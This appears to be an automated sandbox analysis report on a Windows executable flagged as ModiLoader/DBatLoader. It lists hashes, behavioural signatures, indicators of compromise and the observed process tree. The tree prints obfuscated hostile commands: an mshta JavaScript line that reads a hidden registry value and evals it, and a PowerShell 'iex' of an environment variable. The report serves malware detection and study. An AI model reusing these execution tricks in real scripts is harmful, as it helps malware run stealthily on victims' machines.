Analysis
-
max time kernel
135s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
02/10/2022, 23:17
Static task
static1
Behavioral task
behavioral1
Sample
a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe
Resource
win10v2004-20220901-en
General
-
Target
a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe
-
Size
476KB
-
MD5
653d1a10b18c832f9a1668dfd2d2e622
-
SHA1
1b124dad73ee3005b47a0ea7ffcd6fcb7be3139a
-
SHA256
a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd
-
SHA512
954e62e3c8bf6f506aa8b87cdca1edcfcd49d085ea037873608f91ff71679d8fecfc0856c9716b247acc9e22837dad37dce88fe6dc8e03de93e5bef7f365f7d7
-
SSDEEP
12288:9s8I65X4f9cbWu/axAgPH7Yw+eVP3rn8jotmsa761N7toG2Rg:9RWuPubHVP3rmtsa7613sg
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4424 2316 mshta.exe 45 -
ModiLoader Second Stage 3 IoCs
resource yara_rule behavioral2/memory/5104-135-0x0000000000400000-0x000000000047C000-memory.dmp modiloader_stage2 behavioral2/memory/5104-137-0x0000000000060000-0x0000000000120000-memory.dmp modiloader_stage2 behavioral2/memory/5104-146-0x0000000000060000-0x0000000000120000-memory.dmp modiloader_stage2 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 5104 a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe 5104 a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe 3740 powershell.exe 3740 powershell.exe 3740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3740 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 5104 wrote to memory of 3588 5104 a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe 84 PID 5104 wrote to memory of 3588 5104 a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe 84 PID 5104 wrote to memory of 3588 5104 a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe 84 PID 5104 wrote to memory of 344 5104 a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe 86 PID 5104 wrote to memory of 344 5104 a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe 86 PID 5104 wrote to memory of 344 5104 a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe 86 PID 4424 wrote to memory of 3740 4424 mshta.exe 95 PID 4424 wrote to memory of 3740 4424 mshta.exe 95 PID 4424 wrote to memory of 3740 4424 mshta.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe"C:\Users\Admin\AppData\Local\Temp\a61c98ea366af19c5b996674c2876d5a7f981e305342a0eaf0150b0ca6adf5bd.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:3588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c /IM2⤵PID:344
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:Emt5uMc="3ib6y";Oy05=new%20ActiveXObject("WScript.Shell");cjiHtZ2zH="F3Dxeh";WUN5E=Oy05.RegRead("HKLM\\software\\Wow6432Node\\rMSexa\\gLyOZ5Pz9H");yoViUJw3="02ORa1mb13";eval(WUN5E);d5sYALl="md3J";1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:lwvlopzq2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740
-